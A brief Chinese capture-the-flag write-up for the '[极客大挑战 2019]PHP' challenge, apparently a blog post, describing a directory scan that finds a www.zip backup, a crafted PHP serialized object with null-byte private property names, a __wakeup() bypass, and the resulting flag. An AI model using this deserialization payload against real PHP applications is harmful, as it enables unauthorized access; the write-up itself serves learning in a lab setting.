[极客大挑战 2019]PHP

[极客大挑战 2019]PHP

[极客大挑战 2019]PHP

PHP序列化与反序列化(__sleep 与__wakeup)_php7.4.33反序列化wakeup-CSDN博客

挺好看的前端(

dirbuster 扫了一下,找到 www.zip 备份文件,下过来看一下,flag.php 里的 flag 就是个数据,不是 flag。看到 index.php 里给了一个反序列化,尝试构造 $select

审一下 draft.php,先把序列化的值摸出来:

$a= new Name('admin',100);
echo serialize($a);

得到 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

因为 usernamepassword 都是 private,补一下符号:

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

发现 username 不对,接着修改字符串属性,绕过 __wakeup() 方法,即得到 flag{10f9c45e-ce54-47e6-a785-a4e7f18a7ec2}

posted @ 2024-11-24 23:36  Maplisky  阅读(4)  评论(0编辑  收藏  举报